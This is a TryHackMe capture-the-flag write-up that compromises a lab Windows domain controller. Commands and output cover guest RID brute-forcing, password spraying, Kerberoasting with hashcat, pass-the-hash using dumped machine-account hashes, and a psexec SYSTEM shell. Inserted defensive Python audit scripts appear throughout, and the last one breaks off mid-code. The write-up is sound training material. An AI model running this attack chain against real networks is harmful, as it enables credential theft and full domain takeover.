
TryHackMe - Soupedecode 01

Introduction

Test your AD enumeration skills.


OS: Windows

URL: Soupedecode 01

Level: Easy


A simple Active Directory room to test your enumeration skills.

Description

Soupedecode is an intense and engaging challenge in which players must compromise a domain controller by exploiting Kerberos authentication, navigating through SMB shares, performing password spraying, and utilizing Pass-the-Hash techniques. Prepare to test your skills and strategies in this multifaceted cyber security adventure.

Recon

Run a full nmap port scan to find all open ports.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ sudo nmap --min-rate=10000 -vv $IP -p-

Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 124
88/tcp    open  kerberos-sec     syn-ack ttl 124
135/tcp   open  msrpc            syn-ack ttl 124
139/tcp   open  netbios-ssn      syn-ack ttl 124
389/tcp   open  ldap             syn-ack ttl 124
445/tcp   open  microsoft-ds     syn-ack ttl 124
464/tcp   open  kpasswd5         syn-ack ttl 124
593/tcp   open  http-rpc-epmap   syn-ack ttl 124
636/tcp   open  ldapssl          syn-ack ttl 124
3268/tcp  open  globalcatLDAP    syn-ack ttl 124
3269/tcp  open  globalcatLDAPssl syn-ack ttl 124
3389/tcp  open  ms-wbt-server    syn-ack ttl 124
9389/tcp  open  adws             syn-ack ttl 124
49664/tcp open  unknown          syn-ack ttl 124
49667/tcp open  unknown          syn-ack ttl 124
49673/tcp open  unknown          syn-ack ttl 124
49707/tcp open  unknown          syn-ack ttl 124

Many ports associated with Active Directory are open, including: 88/tcp (Kerberos), 135/tcp (MSRPC), 139/tcp (NetBIOS), 389/tcp (LDAP), 445/tcp (SMB), and 3389/tcp (RDP).


Exploitation

Shell as ybob317

Since this is not an assumed-breach scenario, we first need to find some form of initial access.

Start by checking whether null sessions or guest authentication are allowed for LDAP and SMB.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u '' -p ''
LDAP        10.201.69.28    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP        10.201.69.28    389    DC01             [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP        10.201.69.28    389    DC01             [+] SOUPEDECODE.LOCAL\:

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u 'guest' -p ''
LDAP        10.201.69.28    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP        10.201.69.28    389    DC01             [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP        10.201.69.28    389    DC01             [+] SOUPEDECODE.LOCAL\guest:


┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u '' -p '' --shares
SMB         10.201.69.28    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.201.69.28    445    DC01             [-] SOUPEDECODE.LOCAL\: STATUS_ACCESS_DENIED
SMB         10.201.69.28    445    DC01             [-] Error enumerating shares: Error occurs while reading from remote(104)

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u 'guest' -p '' --shares
SMB         10.201.69.28    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.201.69.28    445    DC01             [+] SOUPEDECODE.LOCAL\guest:
SMB         10.201.69.28    445    DC01             [*] Enumerated shares
SMB         10.201.69.28    445    DC01             Share           Permissions     Remark
SMB         10.201.69.28    445    DC01             -----           -----------     ------
SMB         10.201.69.28    445    DC01             ADMIN$                          Remote Admin
SMB         10.201.69.28    445    DC01             backup
SMB         10.201.69.28    445    DC01             C$                              Default share
SMB         10.201.69.28    445    DC01             IPC$            READ            Remote IPC
SMB         10.201.69.28    445    DC01             NETLOGON                        Logon server share
SMB         10.201.69.28    445    DC01             SYSVOL                          Logon server share
SMB         10.201.69.28    445    DC01             Users

Guest authentication works for SMB, but we don't have permission to read the shares. Take note of the backup and Users shares for later.

The guest account doesn't have the privileges to list all domain users directly, but we can use RID brute-forcing to enumerate them.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u 'guest' -p '' --rid-brute | grep -i sidtypeuser | awk '{print $6}' | cut -d\\ -f2 > userlist.txt

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ head -n 10 userlist.txt
Administrator
Guest
krbtgt
DC01$
bmark0
otara1
kleo2
eyara3
pquinn4
jharper5

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ wc -l userlist.txt
1069 userlist.txt

We have a list of 1069 users (which also includes computer accounts).

Now that we have a user list, let's check whether any of the accounts are vulnerable to AS-REP Roasting.
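
The awk/cut pipeline above is fine for this box, but it keeps computer accounts mixed in with users and truncates any account name containing a space at the first word. The parser below (an added example in Python, not part of the original write-up or of the nxc project) reads `--rid-brute` output, splits it by SID type and separates the `$`-suffixed computer accounts. The sample lines are constructed in nxc's output layout; the names and RIDs are illustrative, not taken from the real scan.

```python
import re

# Constructed sample of `nxc smb --rid-brute` output. The column layout follows
# the tool's output; the RIDs and names are illustrative only.
SAMPLE_RID_BRUTE = """\
SMB         10.201.69.28    445    DC01             500: SOUPEDECODE\\Administrator (SidTypeUser)
SMB         10.201.69.28    445    DC01             501: SOUPEDECODE\\Guest (SidTypeUser)
SMB         10.201.69.28    445    DC01             502: SOUPEDECODE\\krbtgt (SidTypeUser)
SMB         10.201.69.28    445    DC01             512: SOUPEDECODE\\Domain Admins (SidTypeGroup)
SMB         10.201.69.28    445    DC01             1000: SOUPEDECODE\\DC01$ (SidTypeUser)
SMB         10.201.69.28    445    DC01             1103: SOUPEDECODE\\bmark0 (SidTypeUser)
SMB         10.201.69.28    445    DC01             1104: SOUPEDECODE\\otara1 (SidTypeUser)
"""

# proto, host, port, netbios name, then "RID: DOMAIN\name (SidTypeX)".
# The lazy ".+?" keeps names with spaces ("Domain Admins") intact.
RID_LINE = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+"
    r"(?P<rid>\d+):\s+"
    r"(?P<domain>[^\\]+)\\(?P<name>.+?)\s+"
    r"\((?P<sidtype>SidType\w+)\)\s*$"
)


def parse_rid_brute(text):
    """Return one record per resolved RID; non-matching lines (banners) are skipped."""
    records = []
    for line in text.splitlines():
        m = RID_LINE.match(line)
        if m:
            records.append({
                "rid": int(m["rid"]),
                "domain": m["domain"],
                "name": m["name"],
                "sidtype": m["sidtype"],
            })
    return records


def split_accounts(records):
    """Bucket records into users, computer accounts ($ suffix) and groups."""
    buckets = {"users": [], "computers": [], "groups": []}
    for r in records:
        if r["sidtype"] == "SidTypeUser":
            key = "computers" if r["name"].endswith("$") else "users"
            buckets[key].append(r["name"])
        elif r["sidtype"] in ("SidTypeGroup", "SidTypeAlias"):
            buckets["groups"].append(r["name"])
    return buckets


if __name__ == "__main__":
    buckets = split_accounts(parse_rid_brute(SAMPLE_RID_BRUTE))
    for kind, names in buckets.items():
        print(f"{kind} ({len(names)}): {', '.join(names)}")
```

Feed it the raw `nxc ... --rid-brute` output instead of the sample and write `buckets["users"]` to the user list; the computer and group buckets are what you want to leave out of any password-related checks, and the group bucket is a quick inventory of privileged groups on the domain.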

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-GetNPUsers SOUPEDECODE.LOCAL/ -usersfile users.txt -outputfile asrep.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User bmark0 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User otara1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User kleo2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eyara3 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pquinn4 doesn't have UF_DONT_REQUIRE_PREAUTH set
....
[-] User monitoring_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User admin doesn't have UF_DONT_REQUIRE_PREAUTH set

There are no hits. Next, let's check whether any account has its username set as its password.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u users.txt -p users.txt --no-bruteforce --continue-on-success
LDAP        10.201.69.28    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP        10.201.69.28    389    DC01             [-] SOUPEDECODE.LOCAL\Administrator:Administrator
.....
LDAP        10.201.69.28    389    DC01             [+] SOUPEDECODE.LOCAL\ybob317:ybob317

We have a hit! The user ybob317 has the password ybob317.

ybob317 cannot RDP, but does have read access to the Users share, which we can use to read the user flag.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u ybob317 -p ybob317 --shares
SMB         10.201.34.69    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.201.34.69    445    DC01             [+] SOUPEDECODE.LOCAL\ybob317:ybob317
SMB         10.201.34.69    445    DC01             [*] Enumerated shares
SMB         10.201.34.69    445    DC01             Share           Permissions     Remark
SMB         10.201.34.69    445    DC01             -----           -----------     ------
SMB         10.201.34.69    445    DC01             ADMIN$                          Remote Admin
SMB         10.201.34.69    445    DC01             backup
SMB         10.201.34.69    445    DC01             C$                              Default share
SMB         10.201.34.69    445    DC01             IPC$            READ            Remote IPC
SMB         10.201.34.69    445    DC01             NETLOGON        READ            Logon server share
SMB         10.201.34.69    445    DC01             SYSVOL          READ            Logon server share
SMB         10.201.34.69    445    DC01             Users           READ


┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-smbclient ybob317:ybob317@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use Users
# ls
drw-rw-rw-          0  Thu Jul  4 18:48:22 2024 .
drw-rw-rw-          0  Wed Jun 18 18:14:47 2025 ..
drw-rw-rw-          0  Thu Jul  4 18:49:01 2024 admin
drw-rw-rw-          0  Fri Jul 25 13:45:10 2025 Administrator
drw-rw-rw-          0  Sat Jun 15 23:49:29 2024 All Users
drw-rw-rw-          0  Sat Jun 15 22:51:08 2024 Default
drw-rw-rw-          0  Sat Jun 15 23:49:29 2024 Default User
-rw-rw-rw-        174  Sat Jun 15 23:46:32 2024 desktop.ini
drw-rw-rw-          0  Sat Jun 15 13:54:32 2024 Public
drw-rw-rw-          0  Mon Jun 17 13:24:32 2024 ybob317
#
# cat ybob317/desktop/user.txt
281**REDACTED**

Shell as file_svc

Now that we have valid domain creds, we can enumerate a lot more:

  • AS-REP Roasting (in case you missed any domain users)
  • Kerberoasting
  • Pillaging shares for sensitive files or files containing credentials
  • Collecting BloodHound data to see if our user has any interesting privileges
  • Dumping the entire LDAP directory to look for user attributes that may contain credentials (description, notes, info, etc.)
  • etc.

Starting with Kerberoasting:

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u ybob317 -p ybob317 --kerberoast kerb.hash
LDAP        10.201.34.69    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP        10.201.34.69    389    DC01             [+] SOUPEDECODE.LOCAL\ybob317:ybob317
LDAP        10.201.34.69    389    DC01             [*] Skipping disabled account: krbtgt
LDAP        10.201.34.69    389    DC01             [*] Total of records returned 5
LDAP        10.201.34.69    389    DC01             [*] sAMAccountName: file_svc, memberOf: [], pwdLastSet: 2024-06-17 13:32:23.726085, lastLogon: <never>
LDAP        10.201.34.69    389    DC01             $krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\file_svc*$[...SNIP...]
LDAP        10.201.34.69    389    DC01             [*] sAMAccountName: firewall_svc, memberOf: [], pwdLastSet: 2024-06-17 13:28:32.710125, lastLogon: <never>
LDAP        10.201.34.69    389    DC01             $krb5tgs$23$*firewall_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\firewall_svc*$[...SNIP...]
LDAP        10.201.34.69    389    DC01             [*] sAMAccountName: backup_svc, memberOf: [], pwdLastSet: 2024-06-17 13:28:49.476511, lastLogon: <never>
LDAP        10.201.34.69    389    DC01             $krb5tgs$23$*backup_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\backup_svc*$[...SNIP...]
LDAP        10.201.34.69    389    DC01             [*] sAMAccountName: web_svc, memberOf: [], pwdLastSet: 2024-06-17 13:29:04.569417, lastLogon: <never>
LDAP        10.201.34.69    389    DC01             $krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\web_svc*$[...SNIP...]
LDAP        10.201.34.69    389    DC01             [*] sAMAccountName: monitoring_svc, memberOf: [], pwdLastSet: 2024-06-17 13:29:18.511871, lastLogon: <never>
LDAP        10.201.34.69    389    DC01             $krb5tgs$23$*monitoring_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\monitoring_svc*$[...SNIP...]

We have a few service accounts that are vulnerable to Kerberoasting. Let's crack them.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ hashcat kerb.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

....

$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\file_svc*$[...SNIP...]:Pass**REDACTED**
Approaching final keyspace - workload adjusted.


Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: kerb.hash
Time.Started.....: Fri Aug  1 16:58:45 2025 (30 secs)
Time.Estimated...: Fri Aug  1 16:59:15 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4692.0 kH/s (0.95ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 2/10 (20.00%) Digests (total), 2/10 (20.00%) Digests (new), 2/10 (20.00%) Salts
Progress.........: 143443850/143443850 (100.00%)
Rejected.........: 0/143443850 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:9 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 34%

Started: Fri Aug  1 16:58:42 2025
Stopped: Fri Aug  1 16:59:17 2025
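
The `$krb5tgs$23$` prefix on every hash above already tells a defender something before any cracking starts: etype 23 means the KDC issued an RC4-HMAC service ticket, whose key is derived directly from the account password, and the same requests appear on the DC as Event ID 4769 with ticket encryption type 0x17. The parser below is an added Python example, not part of the write-up, impacket or hashcat: it reads hash-file or hashcat potfile lines (`hash` or `hash:password`) and reports, per account, the encryption type and whether the password was recovered. The RC4 layout is the one shown on the page; the AES layout (`$krb5tgs$18$account$realm$*spn*$...`) is impacket's, and treating the `*spn*` field as optional is an assumption. The ciphertext in the sample lines is replaced by a placeholder, and the etype-18 line is constructed.

```python
from dataclasses import dataclass
from typing import Optional

# Kerberos encryption types as written in the second field of a $krb5tgs$ hash.
ETYPE_NAMES = {
    1: "DES-CBC-CRC", 3: "DES-CBC-MD5", 17: "AES128-CTS-HMAC-SHA1-96",
    18: "AES256-CTS-HMAC-SHA1-96", 23: "RC4-HMAC",
}
WEAK_ETYPES = {1, 3, 23}  # DES and RC4: password-derived keys, cheap to crack offline

# Constructed sample: the page's RC4 hashes with the ciphertext replaced by a
# placeholder (first line in hashcat potfile form), plus a constructed AES256 line.
SAMPLE_LINES = [
    "$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\\file_svc*$0123abcd$CIPHERTEXT_SNIPPED:Pass**REDACTED**",
    "$krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\\web_svc*$0123abcd$CIPHERTEXT_SNIPPED",
    "$krb5tgs$18$sql_svc$EXAMPLE.LOCAL$*MSSQLSvc/db01.example.local~1433*$0123abcd$CIPHERTEXT_SNIPPED",
]


@dataclass
class TgsHash:
    etype: int
    account: str
    realm: str
    spn: Optional[str]

    @property
    def etype_name(self) -> str:
        return ETYPE_NAMES.get(self.etype, f"etype {self.etype}")

    @property
    def weak_etype(self) -> bool:
        return self.etype in WEAK_ETYPES


def parse_krb5tgs(hash_text: str) -> TgsHash:
    """Parse the header of a $krb5tgs$ hash; the ciphertext fields are ignored."""
    hash_text = hash_text.strip()
    if not hash_text.startswith("$krb5tgs$"):
        raise ValueError("not a $krb5tgs$ hash")
    fields = hash_text.split("$")[2:]          # drop '' and 'krb5tgs'
    etype, body = int(fields[0]), fields[1:]
    if body[0].startswith("*"):
        # RC4 layout (as on the page): *account$realm$spn*$checksum$ciphertext
        account, realm, spn = body[0][1:], body[1], body[2].rstrip("*")
    else:
        # AES layout written by impacket: account$realm$*spn*$checksum$ciphertext.
        # Assumption: the *spn* field may be absent (hashcat's reference format omits it).
        account, realm = body[0], body[1]
        spn = body[2].strip("*") if body[2].startswith("*") else None
    return TgsHash(etype, account, realm, spn)


def audit(lines):
    """Summarise hash-file or hashcat potfile lines (hash or hash:password)."""
    rows = []
    for raw in lines:
        raw = raw.strip()
        if not raw.startswith("$krb5tgs$"):
            continue                                    # banners, status lines
        hash_part, sep, _password = raw.partition(":")  # impacket writes ':' in SPNs as '~'
        h = parse_krb5tgs(hash_part)
        rows.append({"account": h.account, "realm": h.realm, "etype": h.etype_name,
                     "weak_etype": h.weak_etype, "cracked": bool(sep)})
    return rows


if __name__ == "__main__":
    for row in audit(SAMPLE_LINES):
        flag = "WEAK" if row["weak_etype"] else "ok"
        state = "cracked" if row["cracked"] else "not cracked"
        print(f"{row['account']:<16} {row['etype']:<24} {flag:<5} {state}")
```

Run it over `kerb.hash` to get the inventory, and over `hashcat --show` output to see which accounts fell to the wordlist. Every account listed with RC4 is a candidate for moving to AES-only (`msDS-SupportedEncryptionTypes`), and an account that cracks against rockyou in 30 seconds needs a long random password or a gMSA regardless of etype.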

Shell as System

We have creds for the file_svc user, so we restart the enumeration process, checking for any new shares we might have access to.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u file_svc -p 'Pass**REDACTED**' --shares
SMB         10.201.34.69    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.201.34.69    445    DC01             [+] SOUPEDECODE.LOCAL\file_svc:Pass**REDACTED**
SMB         10.201.34.69    445    DC01             [*] Enumerated shares
SMB         10.201.34.69    445    DC01             Share           Permissions     Remark
SMB         10.201.34.69    445    DC01             -----           -----------     ------
SMB         10.201.34.69    445    DC01             ADMIN$                          Remote Admin
SMB         10.201.34.69    445    DC01             backup          READ
SMB         10.201.34.69    445    DC01             C$                              Default share
SMB         10.201.34.69    445    DC01             IPC$            READ            Remote IPC
SMB         10.201.34.69    445    DC01             NETLOGON        READ            Logon server share
SMB         10.201.34.69    445    DC01             SYSVOL          READ            Logon server share
SMB         10.201.34.69    445    DC01             Users

We have access to the backup share. Let's see if we can find any sensitive files.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-smbclient file_svc:'Pass**REDACTED**'@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use backup
# ls
drw-rw-rw-          0  Mon Jun 17 13:41:17 2024 .
drw-rw-rw-          0  Fri Jul 25 13:51:20 2025 ..
-rw-rw-rw-        892  Mon Jun 17 13:41:23 2024 backup_extract.txt
# get backup_extract.txt
# exit

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41d**REDACTED**:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::

We get a file named backup_extract.txt, which appears to be a pwdump-style hash dump (user:RID:LM hash:NT hash) of machine accounts.
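
Beyond the usable credential, the dump itself carries audit signal a defender would read the same way: the LM field is the fixed value written when LM storage is disabled, and two pairs of accounts (MailServer$/BackupServer$, CitrixServer$/MonitoringServer$) share an NT hash, which means they share a password. Real machine-account passwords are random and rotated automatically, so identical hashes point at accounts whose passwords were set by hand. The script below is an added Python example, not the write-up's or any tool's code; it parses pwdump lines, flags stored LM hashes, empty passwords and shared NT hashes, and reports unparseable lines. The input lines are copied from backup_extract.txt as shown on the page, including the redacted FileServer$ entry, which exercises the unparseable-line path.

```python
import re
from collections import defaultdict

# LM field written when LM hash storage is disabled, and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

PWDUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Lines as shown on the page for backup_extract.txt (the FileServer$ hash is redacted there).
BACKUP_EXTRACT = """\
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41d**REDACTED**:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
"""


def parse_pwdump(text):
    """Return (entries, unparseable_lines); hashes are normalised to lower case."""
    entries, bad = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = PWDUMP_LINE.match(line)
        if not m:
            bad.append(line)
            continue
        entries.append({"user": m["user"], "rid": int(m["rid"]),
                        "lm": m["lm"].lower(), "nt": m["nt"].lower()})
    return entries, bad


def shared_nt_hashes(entries):
    """Map NT hash -> sorted account names, for hashes used by more than one account."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {nt: sorted(users) for nt, users in by_nt.items() if len(users) > 1}


def audit_pwdump(text):
    """Produce (subject, finding) pairs for the dump."""
    entries, bad = parse_pwdump(text)
    findings = []
    for e in entries:
        if e["lm"] != EMPTY_LM:
            findings.append((e["user"], "LM hash stored (LM storage not disabled)"))
        if e["nt"] == EMPTY_NT:
            findings.append((e["user"], "empty password"))
    for nt, users in shared_nt_hashes(entries).items():
        findings.append((", ".join(users), f"same NT hash {nt[:8]}... (identical password)"))
    for line in bad:
        findings.append((line, "unparseable line"))
    return findings


if __name__ == "__main__":
    for subject, finding in audit_pwdump(BACKUP_EXTRACT):
        print(f"{finding:<45} {subject}")
```

The same checks apply to a full NTDS export: run `shared_nt_hashes` over every account and you get the password-reuse clusters without ever cracking anything, which is exactly how the reuse between MailServer$ and BackupServer$ would have been spotted before the file was ever left on a share.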

Let's try to see if any of the creds are actually valid.

# generate a user and hash file list so it's easier to use with nxc

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ cat backup_extract.txt | cut -d: -f1 > backup_users.txt

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ cat backup_extract.txt | cut -d: -f4 > backup_hashes.txt

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u backup_users.txt -H backup_hashes.txt --no-brute
SMB         10.201.34.69    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.201.34.69    445    DC01             [-] SOUPEDECODE.LOCAL\WebServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB         10.201.34.69    445    DC01             [-] SOUPEDECODE.LOCAL\DatabaseServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB         10.201.34.69    445    DC01             [-] SOUPEDECODE.LOCAL\CitrixServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB         10.201.34.69    445    DC01             [+] SOUPEDECODE.LOCAL\FileServer$:e41da**REDACTED** (Pwn3d!)

We have valid creds for the FileServer$ machine account, and (Pwn3d!) indicates that this account has administrative access to the machine.

Let's try to get a shell on the machine as SYSTEM using impacket-psexec and read the root flag.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-psexec 'FileServer$'@$IP -hashes :e41da7e79a**REDACTED**
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 10.201.34.69.....
[*] Found writable share ADMIN$
[*] Uploading file lSJpbWWT.exe
[*] Opening SVCManager on 10.201.34.69.....
[*] Creating service RntB on 10.201.34.69.....
[*] Starting service RntB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
**REDACTED**

It looks like the FileServer$ machine account was added to the Enterprise Admins group, which is what allowed us to use psexec to get a shell as SYSTEM. We can confirm this with an LDAP query:

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u ybob317 -p ybob317 --query '(&(objectclass=user)(sAMAccountName=FileServer$))' ""
LDAP        10.201.34.69    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP        10.201.34.69    389    DC01             [+] SOUPEDECODE.LOCAL\ybob317:ybob317
LDAP        10.201.34.69    389    DC01             [+] Response for object: CN=FileServer,CN=Computers,DC=SOUPEDECODE,DC=LOCAL
LDAP        10.201.34.69    389    DC01             objectClass          top
LDAP        10.201.34.69    389    DC01                                  person
LDAP        10.201.34.69    389    DC01                                  organizationalPerson
LDAP        10.201.34.69    389    DC01                                  user
LDAP        10.201.34.69    389    DC01                                  computer
LDAP        10.201.34.69    389    DC01             cn                   FileServer
LDAP        10.201.34.69    389    DC01             distinguishedName    CN=FileServer,CN=Computers,DC=SOUPEDECODE,DC=LOCAL
LDAP        10.201.34.69    389    DC01             instanceType         4
LDAP        10.201.34.69    389    DC01             whenCreated          20240615200611.0Z
LDAP        10.201.34.69    389    DC01             whenChanged          20250801211100.0Z
LDAP        10.201.34.69    389    DC01             uSNCreated           22204
LDAP        10.201.34.69    389    DC01             memberOf             CN=Enterprise Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL
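
A computer object sitting in Enterprise Admins is the root cause of this box, and it is something an administrator can check for on any domain. The script below is an added Python example, not the write-up's or nxc's code: it parses `nxc ldap --query` output in the layout shown above (handling the continuation lines that multi-valued attributes such as objectClass produce) and reports computer objects that are members of the built-in privileged groups. The sample output reuses the FileServer object from the page and adds a constructed WebServer object as a negative control; `DIRECT_FILTER` is the equivalent LDAP filter to run against the DC directly, using the base DN of the page's domain.

```python
import re

PRIVILEGED_GROUPS = {
    "Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators",
    "Account Operators", "Backup Operators", "Server Operators", "Print Operators",
}

# Equivalent check run directly against LDAP; the matching-rule OID resolves nested
# membership. Base DN taken from the page's domain.
DIRECT_FILTER = (
    "(&(objectClass=computer)(memberOf:1.2.840.113556.1.4.1941:="
    "CN=Enterprise Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL))"
)

LINE_PREFIX = re.compile(r"^LDAP\s+\S+\s+\d+\s+\S+")
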